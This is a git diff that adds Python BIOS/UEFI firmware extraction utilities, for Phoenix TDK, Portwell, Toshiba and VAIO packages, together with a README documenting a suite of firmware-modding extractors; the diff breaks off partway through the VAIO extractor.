tdk_mod.get_offset() + + # Check if TDK Entry raw data Offset is valid + if mod_off >= len(input_buffer): + printer('Error: Phoenix TDK Entry > Offset is out of bounds!\n', padding + 12, pause=True) + exit_code = 2 + + # Store TDK Entry raw data (relative to TDK Base, not TDK Header) + mod_data = input_buffer[mod_off:mod_off + tdk_mod.Size] + + # Check if TDK Entry raw data is complete + if len(mod_data) != tdk_mod.Size: + printer('Error: Phoenix TDK Entry > Data is truncated!\n', padding + 12, pause=True) + exit_code = 3 + + # Check if TDK Entry Reserved is present + if tdk_mod.Reserved: + printer('Error: Phoenix TDK Entry > Reserved is not empty!\n', padding + 12, pause=True) + exit_code = 4 + + # Decompress TDK Entry raw data, when applicable (i.e. 
LZMA) + if tdk_mod.get_compression() == 'LZMA': + try: + mod_data = lzma.LZMADecompressor().decompress(mod_data) + except Exception: + printer('Error: Phoenix TDK Entry > LZMA decompression failed!\n', padding + 12, pause=True) + exit_code = 5 + + # Generate TDK Entry file name, avoid crash if Entry data is bad + mod_name = tdk_mod.get_name() or f'Unknown_{entry_index + 1:02d}.bin' + + # Generate TDK Entry file data output path + mod_file = os.path.join(extract_path, safe_name(mod_name)) + + # Account for potential duplicate file names + if os.path.isfile(mod_file): mod_file += f'_{entry_index + 1:02d}' + + # Save TDK Entry data to output file + with open(mod_file, 'wb') as out_file: + out_file.write(mod_data) + + return exit_code + +# Get ctypes Structure Sizes +TDK_HDR_LEN = ctypes.sizeof(PhoenixTdkHeader) +TDK_MOD_LEN = ctypes.sizeof(PhoenixTdkEntry) + +# Set placeholder TDK Entries Size +TDK_DUMMY_LEN = 0x200 + +if __name__ == '__main__': + BIOSUtility(TITLE, is_phoenix_tdk, phoenix_tdk_extract).run_utility() diff --git a/blobs/t480/biosutilities/Portwell_EFI_Extract.py b/blobs/t480/biosutilities/Portwell_EFI_Extract.py new file mode 100644 index 00000000..bb40705a --- /dev/null +++ b/blobs/t480/biosutilities/Portwell_EFI_Extract.py @@ -0,0 +1,136 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Portwell EFI Extract +Portwell EFI Update Extractor +Copyright (C) 2021-2022 Plato Mavropoulos +""" + +TITLE = 'Portwell EFI Update Extractor v2.0_a12' + +import os +import sys + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.comp_efi import efi_decompress, is_efi_compressed +from common.path_ops import make_dirs, safe_name +from common.pe_ops import get_pe_file +from common.patterns import PAT_MICROSOFT_MZ, PAT_PORTWELL_EFI +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +FILE_NAMES = { + 0 : 'Flash.efi', + 1 : 'Fparts.txt', + 2 : 'Update.nsh', + 3 : 'Temp.bin', + 4 : 'SaveDmiData.efi' + } + +# Check if input is Portwell EFI executable +def is_portwell_efi(in_file): + in_buffer = file_to_bytes(in_file) + + try: + pe_buffer = get_portwell_pe(in_buffer)[1] + except Exception: + pe_buffer = b'' + + is_mz = PAT_MICROSOFT_MZ.search(in_buffer[:0x2]) # EFI images start with PE Header MZ + + is_uu = PAT_PORTWELL_EFI.search(pe_buffer[:0x4]) # Portwell EFI files start with + + return bool(is_mz and is_uu) + +# Get PE of Portwell EFI executable +def get_portwell_pe(in_buffer): + pe_file = get_pe_file(in_buffer, fast=True) # Analyze EFI Portable Executable (PE) + + pe_data = in_buffer[pe_file.OPTIONAL_HEADER.SizeOfImage:] # Skip EFI executable (pylint: disable=E1101) + + return pe_file, pe_data + +# Parse & Extract Portwell UEFI Unpacker +def portwell_efi_extract(input_file, extract_path, padding=0): + efi_files = [] # Initialize EFI Payload file chunks + + input_buffer = file_to_bytes(input_file) + + make_dirs(extract_path, delete=True) + + pe_file,pe_data = get_portwell_pe(input_buffer) + + efi_title = get_unpacker_tag(input_buffer, pe_file) + + printer(efi_title, padding) + + # Split EFI Payload into file chunks + efi_list = list(PAT_PORTWELL_EFI.finditer(pe_data)) + for idx,val in enumerate(efi_list): + efi_bgn = val.end() + efi_end = len(pe_data) if idx == len(efi_list) - 1 else efi_list[idx + 1].start() + efi_files.append(pe_data[efi_bgn:efi_end]) + + parse_efi_files(extract_path, efi_files, padding) + +# Get Portwell UEFI Unpacker tag +def get_unpacker_tag(input_buffer, pe_file): + 
unpacker_tag_txt = 'UEFI Unpacker' + + for pe_section in pe_file.sections: + # Unpacker Tag, Version, Strings etc are found in .data PE section + if pe_section.Name.startswith(b'.data'): + pe_data_bgn = pe_section.PointerToRawData + pe_data_end = pe_data_bgn + pe_section.SizeOfRawData + + # Decode any valid UTF-16 .data PE section info to a parsable text buffer + pe_data_txt = input_buffer[pe_data_bgn:pe_data_end].decode('utf-16','ignore') + + # Search .data for UEFI Unpacker tag + unpacker_tag_bgn = pe_data_txt.find(unpacker_tag_txt) + if unpacker_tag_bgn != -1: + unpacker_tag_len = pe_data_txt[unpacker_tag_bgn:].find('=') + if unpacker_tag_len != -1: + unpacker_tag_end = unpacker_tag_bgn + unpacker_tag_len + unpacker_tag_raw = pe_data_txt[unpacker_tag_bgn:unpacker_tag_end] + + # Found full UEFI Unpacker tag, store and slightly beautify the resulting text + unpacker_tag_txt = unpacker_tag_raw.strip().replace(' ',' ').replace('<',' <') + + break # Found PE .data section, skip the rest + + return unpacker_tag_txt + +# Process Portwell UEFI Unpacker payload files +def parse_efi_files(extract_path, efi_files, padding): + for file_index,file_data in enumerate(efi_files): + if file_data in (b'', b'NULL'): + continue # Skip empty/unused files + + file_name = FILE_NAMES.get(file_index, f'Unknown_{file_index}.bin') # Assign Name to EFI file + + printer(f'[{file_index}] {file_name}', padding + 4) # Print EFI file name, indicate progress + + if file_name.startswith('Unknown_'): + printer(f'Note: Detected new Portwell EFI file ID {file_index}!', padding + 8, pause=True) # Report new EFI files + + file_path = os.path.join(extract_path, safe_name(file_name)) # Store EFI file output path + + with open(file_path, 'wb') as out_file: + out_file.write(file_data) # Store EFI file data to drive + + # Attempt to detect EFI compression & decompress when applicable + if is_efi_compressed(file_data): + comp_fname = file_path + '.temp' # Store temporary compressed file name + + os.replace(file_path, comp_fname) # Rename initial/compressed file + + if efi_decompress(comp_fname, file_path, padding + 8) == 0: + os.remove(comp_fname) # Successful decompression, delete compressed file + +if __name__ == '__main__': + BIOSUtility(TITLE, is_portwell_efi, portwell_efi_extract).run_utility() diff --git a/blobs/t480/biosutilities/README.md b/blobs/t480/biosutilities/README.md new file mode 100644 index 00000000..0d8c29c9 --- /dev/null +++ b/blobs/t480/biosutilities/README.md @@ -0,0 +1,552 @@ +# BIOSUtilities [Refactor - WIP] +**Various BIOS Utilities for Modding/Research** + +[BIOS Utilities News Feed](https://twitter.com/platomaniac) + +* [**AMI BIOS Guard Extractor**](#ami-bios-guard-extractor) +* [**AMI UCP Update Extractor**](#ami-ucp-update-extractor) +* [**Apple EFI IM4P Splitter**](#apple-efi-im4p-splitter) +* [**Apple EFI Image Identifier**](#apple-efi-image-identifier) +* [**Apple EFI Package Extractor**](#apple-efi-package-extractor) +* [**Apple EFI PBZX Extractor**](#apple-efi-pbzx-extractor) +* [**Award BIOS Module Extractor**](#award-bios-module-extractor) +* [**Dell PFS Update Extractor**](#dell-pfs-update-extractor) +* [**Fujitsu SFX BIOS Extractor**](#fujitsu-sfx-bios-extractor) +* [**Fujitsu UPC BIOS Extractor**](#fujitsu-upc-bios-extractor) +* [**Insyde iFlash/iFdPacker Extractor**](#insyde-iflashifdpacker-extractor) +* [**Panasonic BIOS Package Extractor**](#panasonic-bios-package-extractor) +* [**Phoenix TDK Packer Extractor**](#phoenix-tdk-packer-extractor) +* [**Portwell EFI Update 
Extractor**](#portwell-efi-update-extractor) +* [**Toshiba BIOS COM Extractor**](#toshiba-bios-com-extractor) +* [**VAIO Packaging Manager Extractor**](#vaio-packaging-manager-extractor) + +## **AMI BIOS Guard Extractor** + +![]() + +#### **Description** + +Parses AMI BIOS Guard (a.k.a. PFAT, Platform Firmware Armoring Technology) images, extracts their SPI/BIOS/UEFI firmware components and decompiles the Intel BIOS Guard Scripts. It supports all AMI PFAT revisions and formats, including those with Index Information tables or nested AMI PFAT structures. The output comprises only final firmware components which are directly usable by end users. + +Note that the AMI PFAT structure may not have an explicit component order. AMI's BIOS Guard Firmware Update Tool (AFUBGT) updates components based on the user/OEM provided Parameters and Options or Index Information table, when applicable. That means that merging all the components together does not usually yield a proper SPI/BIOS/UEFI image. The utility does generate such a merged file with the name "00 -- \\_ALL.bin" but it is up to the end user to determine its usefulness. Moreover, any custom OEM data after the AMI PFAT structure are additionally stored in the last file with the name "\ -- \_OOB.bin" and it is once again up to the end user to determine its usefulness. In cases where the trailing custom OEM data include a nested AMI PFAT structure, the utility will process and extract it automatically as well. + +#### **Usage** + +You can either Drag & Drop or manually enter AMI BIOS Guard (PFAT) image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +Optionally, to decompile the AMI PFAT \> Intel BIOS Guard Scripts, you must have the following 3rd party utility at the "external" project directory: + +* [BIOS Guard Script Tool](https://github.com/platomav/BGScriptTool) (i.e. big_script_tool.py) + +#### **Pictures** + +![]() + +## **AMI UCP Update Extractor** + +![]() + +#### **Description** + +Parses AMI UCP (Utility Configuration Program) Update executables, extracts their firmware components (e.g. SPI/BIOS/UEFI, EC, ME etc) and shows all relevant info. It supports all AMI UCP revisions and formats, including those with nested AMI PFAT, AMI UCP or Insyde iFlash/iFdPacker structures. The output comprises only final firmware components and utilities which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter AMI UCP Update executable file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts +* -c or --checksum : verify AMI UCP Checksums (slow) + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. 
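The extractors in this collection can also be driven from Python rather than via drag & drop or the command line. A minimal sketch for the AMI BIOS Guard extractor above, reusing its own `is_ami_pfat`/`parse_pfat_file` entry points (the input file name and output directory are placeholders, and the snippet assumes it runs from the project root so the `common` package resolves):

```python
# Sketch: run the AMI BIOS Guard (PFAT) extractor programmatically.
# 'image_pfat.bin' and 'image_pfat_extracted' are hypothetical placeholders.
from AMI_PFAT_Extract import is_ami_pfat, parse_pfat_file

with open('image_pfat.bin', 'rb') as image:
    buffer = image.read()

if is_ami_pfat(buffer):
    parse_pfat_file(buffer, 'image_pfat_extracted', 0)
else:
    print('Not an AMI BIOS Guard (PFAT) image!')
```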
+ +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tools at the "external" project directory: + +* [TianoCompress](https://github.com/tianocore/edk2/tree/master/BaseTools/Source/C/TianoCompress/) (i.e. [TianoCompress.exe for Windows](https://github.com/tianocore/edk2-BaseTools-win32/) or TianoCompress for Linux) +* [7-Zip Console](https://www.7-zip.org/) (i.e. 7z.exe for Windows or 7zzs for Linux) + +Optionally, to decompile the AMI UCP \> AMI PFAT \> Intel BIOS Guard Scripts (when applicable), you must have the following 3rd party utility at the "external" project directory: + +* [BIOS Guard Script Tool](https://github.com/platomav/BGScriptTool) (i.e. big_script_tool.py) + +#### **Pictures** + +![]() + +## **Apple EFI IM4P Splitter** + +![]() + +#### **Description** + +Parses Apple IM4P multi-EFI files and splits all detected EFI firmware into separate Intel SPI/BIOS images. The output comprises only final firmware components and utilities which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Apple EFI IM4P file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you do not need any prerequisites. + +#### **Pictures** + +![]() + +## **Apple EFI Image Identifier** + +![]() + +#### **Description** + +Parses Apple EFI images and identifies them based on Intel's official $IBIOSI$ tag, which contains info such as Model, Version, Build, Date and Time. Optionally, the utility can rename the input Apple EFI image based on the retrieved $IBIOSI$ tag info, while also making sure to differentiate any EFI images with the same $IBIOSI$ tag (e.g. Production, Pre-Production) by appending a checksum of their data. + +#### **Usage** + +You can either Drag & Drop or manually enter Apple EFI image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts +* -r or --rename : rename EFI image based on its tag + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tools at the "external" project directory: + +* [UEFIFind](https://github.com/LongSoft/UEFITool/) (i.e. [UEFIFind.exe for Windows or UEFIFind for Linux](https://github.com/LongSoft/UEFITool/releases)) +* [UEFIExtract](https://github.com/LongSoft/UEFITool/) (i.e. [UEFIExtract.exe for Windows or UEFIExtract for Linux](https://github.com/LongSoft/UEFITool/releases)) + +#### **Pictures** + +![]() + +## **Apple EFI Package Extractor** + +![]() + +#### **Description** + +Parses Apple EFI PKG firmware packages (i.e. FirmwareUpdate.pkg, BridgeOSUpdateCustomer.pkg), extracts their EFI images, splits those in IM4P format and identifies/renames the final Intel SPI/BIOS images accordingly. The output comprises only final firmware components which are directly usable by end users. 
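Both this utility and the Apple EFI Image Identifier above shell out to helper binaries that are expected in the project's `external` directory. Whether they are in place can be verified up front with the path helpers from `common` (a sketch; the helpers resolve to `<project root>/external/<tool>` and append `.exe` on Windows):

```python
# Sketch: confirm the external helper tools exist before batch extraction.
# Path helpers are taken from common/externals.py and common/comp_szip.py.
import os

from common.comp_szip import get_szip_path
from common.externals import get_uefiextract_path, get_uefifind_path

for tool in (get_uefifind_path(), get_uefiextract_path(), get_szip_path()):
    print(f'{"found" if os.path.isfile(tool) else "missing"}: {tool}')
```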
+ +#### **Usage** + +You can either Drag & Drop or manually enter Apple EFI PKG package file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tools at the "external" project directory: + +* [7-Zip Console](https://www.7-zip.org/) (i.e. 7z.exe for Windows or 7zzs for Linux) + +#### **Pictures** + +![]() + +## **Apple EFI PBZX Extractor** + +![]() + +#### **Description** + +Parses Apple EFI PBZX images, re-assembles their CPIO payload and extracts its firmware components (e.g. IM4P, EFI, Utilities, Scripts etc). It supports CPIO re-assembly from both Raw and XZ compressed PBZX Chunks. The output comprises only final firmware components and utilities which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Apple EFI PBZX image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tools at the "external" project directory: + +* [7-Zip Console](https://www.7-zip.org/) (i.e. 7z.exe for Windows or 7zzs for Linux) + +#### **Pictures** + +![]() + +## **Award BIOS Module Extractor** + +![]() + +#### **Description** + +Parses Award BIOS images and extracts their modules (e.g. RAID, MEMINIT, \_EN_CODE, awardext etc). It supports all Award BIOS image revisions and formats, including those which contain LZH compressed files. The output comprises only final firmware components which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Award BIOS image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tool at the "external" project directory: + +* [7-Zip Console](https://www.7-zip.org/) (i.e. 7z.exe for Windows or 7zzs for Linux) + +#### **Pictures** + +![]() + +## **Dell PFS Update Extractor** + +![]() + +#### **Description** + +Parses Dell PFS Update images and extracts their Firmware (e.g. SPI, BIOS/UEFI, EC, ME etc) and Utilities (e.g. Flasher etc) component sections. It supports all Dell PFS revisions and formats, including those which are originally LZMA compressed in ThinOS packages (PKG), ZLIB compressed or Intel BIOS Guard (PFAT) protected. The output comprises only final firmware components which are directly usable by end users. 
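The Python 3.10 requirement repeated in each Compatibility note is enforced at startup by `common/system.py`, which aborts with exit code 125 on older interpreters. An equivalent standalone check (a minimal sketch):

```python
# Sketch: the same version gate common/system.py applies before running.
import sys

if sys.version_info < (3, 10):
    raise SystemExit(f'Error: Python >= 3.10 required, '
                     f'not {sys.version_info[0]}.{sys.version_info[1]}!')
```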
+ +#### **Usage** + +You can either Drag & Drop or manually enter Dell PFS Update images(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts +* -a or --advanced : extract signatures and metadata +* -s or --structure : show PFS structure information + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +Optionally, to decompile the Intel BIOS Guard (PFAT) Scripts, you must have the following 3rd party utility at the "external" project directory: + +* [BIOS Guard Script Tool](https://github.com/platomav/BGScriptTool) (i.e. big_script_tool.py) + +#### **Pictures** + +![]() + +## **Fujitsu SFX BIOS Extractor** + +![]() + +#### **Description** + +Parses Fujitsu SFX BIOS images and extracts their obfuscated Microsoft CAB archived firmware (e.g. SPI, BIOS/UEFI, EC, ME etc) and utilities (e.g. WinPhlash, PHLASH.INI etc) components. The output comprises only final firmware components which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Fujitsu SFX BIOS image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tool at the "external" project directory: + +* [7-Zip Console](https://www.7-zip.org/) (i.e. 7z.exe for Windows or 7zzs for Linux) + +#### **Pictures** + +![]() + +## **Fujitsu UPC BIOS Extractor** + +![]() + +#### **Description** + +Parses Fujitsu UPC BIOS images and extracts their EFI compressed SPI/BIOS/UEFI firmware component. The output comprises only a final firmware component which is directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Fujitsu UPC BIOS image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tool at the "external" project directory: + +* [TianoCompress](https://github.com/tianocore/edk2/tree/master/BaseTools/Source/C/TianoCompress/) (i.e. [TianoCompress.exe for Windows](https://github.com/tianocore/edk2-BaseTools-win32/) or TianoCompress for Linux) + +#### **Pictures** + +![]() + +## **Insyde iFlash/iFdPacker Extractor** + +![]() + +#### **Description** + +Parses Insyde iFlash/iFdPacker Update images and extracts their firmware (e.g. SPI, BIOS/UEFI, EC, ME etc) and utilities (e.g. InsydeFlash, H2OFFT, FlsHook, iscflash, platform.ini etc) components. 
It supports all Insyde iFlash/iFdPacker revisions and formats, including those which are 7-Zip SFX 7z compressed in raw, obfuscated or password-protected form. The output comprises only final firmware components which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Insyde iFlash/iFdPacker Update image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you do not need any prerequisites. + +#### **Pictures** + +![]() + +## **Panasonic BIOS Package Extractor** + +![]() + +#### **Description** + +Parses Panasonic BIOS Package executables and extracts their firmware (e.g. SPI, BIOS/UEFI, EC etc) and utilities (e.g. winprom, configuration etc) components. It supports all Panasonic BIOS Package revisions and formats, including those which contain LZNT1 compressed files. The output comprises only final firmware components which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Panasonic BIOS Package executable file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party Python modules installed: + +* [pefile](https://pypi.org/project/pefile/) +* [lznt1](https://pypi.org/project/lznt1/) + +Moreover, you must have the following 3rd party tool at the "external" project directory: + +* [7-Zip Console](https://www.7-zip.org/) (i.e. 7z.exe for Windows or 7zzs for Linux) + +#### **Pictures** + +![]() + +## **Phoenix TDK Packer Extractor** + +![]() + +#### **Description** + +Parses Phoenix Tools Development Kit (TDK) Packer executables and extracts their firmware (e.g. SPI, BIOS/UEFI, EC etc) and utilities (e.g. WinFlash etc) components. It supports all Phoenix TDK Packer revisions and formats, including those which contain LZMA compressed files. The output comprises only final firmware components which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Phoenix Tools Development Kit (TDK) Packer executable file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. 
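The check/extract pair that backs the CLI can also be scripted directly; a minimal sketch using the module's `is_phoenix_tdk` and `phoenix_tdk_extract` entry points (file names are placeholders, `pefile` must be installed, and the snippet assumes it runs from the project root):

```python
# Sketch: drive the Phoenix TDK Packer extractor from Python.
# 'tdk_packer.exe' and 'tdk_packer_extracted' are hypothetical placeholders.
from Phoenix_TDK_Extract import is_phoenix_tdk, phoenix_tdk_extract

if is_phoenix_tdk('tdk_packer.exe'):
    exit_code = phoenix_tdk_extract('tdk_packer.exe', 'tdk_packer_extracted')
    print(f'Extraction finished with exit code {exit_code}')
```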
+ +#### **Prerequisites** + +To run the utility, you must have the following 3rd party Python module installed: + +* [pefile](https://pypi.org/project/pefile/) + +#### **Pictures** + +![]() + +## **Portwell EFI Update Extractor** + +![]() + +#### **Description** + +Parses Portwell UEFI Unpacker EFI executables (usually named "Update.efi") and extracts their firmware (e.g. SPI, BIOS/UEFI, EC etc) and utilities (e.g. Flasher etc) components. It supports all known Portwell UEFI Unpacker revisions (v1.1, v1.2, v2.0) and formats (used, empty, null), including those which contain EFI compressed files. The output comprises only final firmware components and utilities which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Portwell UEFI Unpacker EFI executable file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party Python module installed: + +* [pefile](https://pypi.org/project/pefile/) + +> pip3 install pefile + +Moreover, you must have the following 3rd party tool at the "external" project directory: + +* [TianoCompress](https://github.com/tianocore/edk2/tree/master/BaseTools/Source/C/TianoCompress/) (i.e. [TianoCompress.exe for Windows](https://github.com/tianocore/edk2-BaseTools-win32/) or TianoCompress for Linux) + +#### **Pictures** + +![]() + +## **Toshiba BIOS COM Extractor** + +![]() + +#### **Description** + +Parses Toshiba BIOS COM images and extracts their raw or compressed SPI/BIOS/UEFI firmware component. This utility is basically an easy to use python wrapper around [ToshibaComExtractor by LongSoft](https://github.com/LongSoft/ToshibaComExtractor). The output comprises only a final firmware component which is directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Toshiba BIOS COM image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tool at the "external" project directory: + +* [ToshibaComExtractor](https://github.com/LongSoft/ToshibaComExtractor) (i.e. [comextract.exe for Windows or comextract for Linux](https://github.com/LongSoft/ToshibaComExtractor/releases)) + +#### **Pictures** + +![]() + +## **VAIO Packaging Manager Extractor** + +![]() + +#### **Description** + +Parses VAIO Packaging Manager executables and extracts their firmware (e.g. SPI, BIOS/UEFI, EC, ME etc), utilities (e.g. WBFLASH etc) and driver (audio, video etc) components. If direct extraction fails, it attempts to unlock the executable in order to run at all non-VAIO systems and allow the user to choose the extraction location. 
It supports all VAIO Packaging Manager revisions and formats, including those which contain obfuscated Microsoft CAB archives or obfuscated unlock values. The output comprises only final firmware components which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter VAIO Packaging Manager executable file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tool at the "external" project directory: + +* [7-Zip Console](https://www.7-zip.org/) (i.e. 7z.exe for Windows or 7zzs for Linux) + +#### **Pictures** + +![]() \ No newline at end of file diff --git a/blobs/t480/biosutilities/Toshiba_COM_Extract.py b/blobs/t480/biosutilities/Toshiba_COM_Extract.py new file mode 100644 index 00000000..da6ee437 --- /dev/null +++ b/blobs/t480/biosutilities/Toshiba_COM_Extract.py @@ -0,0 +1,63 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Toshiba COM Extract +Toshiba BIOS COM Extractor +Copyright (C) 2018-2022 Plato Mavropoulos +""" + +TITLE = 'Toshiba BIOS COM Extractor v2.0_a4' + +import os +import sys +import subprocess + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.externals import get_comextract_path +from common.path_ops import make_dirs, path_stem, path_suffixes +from common.patterns import PAT_TOSHIBA_COM +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +# Check if input is Toshiba BIOS COM image +def is_toshiba_com(in_file): + buffer = file_to_bytes(in_file) + + is_ext = path_suffixes(in_file)[-1].upper() == '.COM' if os.path.isfile(in_file) else True + + is_com = PAT_TOSHIBA_COM.search(buffer) + + return is_ext and is_com + +# Parse & Extract Toshiba BIOS COM image +def toshiba_com_extract(input_file, extract_path, padding=0): + if not os.path.isfile(input_file): + printer('Error: Could not find input file path!', padding) + + return 1 + + make_dirs(extract_path, delete=True) + + output_name = path_stem(input_file) + output_file = os.path.join(extract_path, f'{output_name}.bin') + + try: + subprocess.run([get_comextract_path(), input_file, output_file], check=True, stdout=subprocess.DEVNULL) + + if not os.path.isfile(output_file): + raise Exception('EXTRACT_FILE_MISSING') + except Exception: + printer(f'Error: ToshibaComExtractor could not extract file {input_file}!', padding) + + return 2 + + printer(f'Succesfull {output_name} extraction via ToshibaComExtractor!', padding) + + return 0 + +if __name__ == '__main__': + BIOSUtility(TITLE, is_toshiba_com, toshiba_com_extract).run_utility() diff --git a/blobs/t480/biosutilities/VAIO_Package_Extract.py b/blobs/t480/biosutilities/VAIO_Package_Extract.py new file mode 100644 index 00000000..9bb49bfe --- /dev/null +++ b/blobs/t480/biosutilities/VAIO_Package_Extract.py @@ -0,0 +1,147 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +VAIO Package Extractor +VAIO Packaging Manager Extractor +Copyright (C) 2019-2022 Plato Mavropoulos +""" + +TITLE = 'VAIO Packaging Manager Extractor v3.0_a8' + +import os +import sys + +# Stop __pycache__ generation 
+sys.dont_write_bytecode = True + +from common.comp_szip import is_szip_supported, szip_decompress +from common.path_ops import make_dirs +from common.patterns import PAT_VAIO_CAB, PAT_VAIO_CFG, PAT_VAIO_CHK, PAT_VAIO_EXT +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +# Check if input is VAIO Packaging Manager +def is_vaio_pkg(in_file): + buffer = file_to_bytes(in_file) + + return bool(PAT_VAIO_CFG.search(buffer)) + +# Extract VAIO Packaging Manager executable +def vaio_cabinet(name, buffer, extract_path, padding=0): + match_cab = PAT_VAIO_CAB.search(buffer) # Microsoft CAB Header XOR 0xFF + + if not match_cab: + return 1 + + printer('Detected obfuscated CAB archive!', padding) + + # Determine the Microsoft CAB image size + cab_size = int.from_bytes(buffer[match_cab.start() + 0x8:match_cab.start() + 0xC], 'little') # Get LE XOR-ed CAB size + xor_size = int.from_bytes(b'\xFF' * 0x4, 'little') # Create CAB size XOR value + cab_size ^= xor_size # Perform XOR 0xFF and get actual CAB size + + printer('Removing obfuscation...', padding + 4) + + # Determine the Microsoft CAB image Data + cab_data = int.from_bytes(buffer[match_cab.start():match_cab.start() + cab_size], 'big') # Get BE XOR-ed CAB data + xor_data = int.from_bytes(b'\xFF' * cab_size, 'big') # Create CAB data XOR value + cab_data = (cab_data 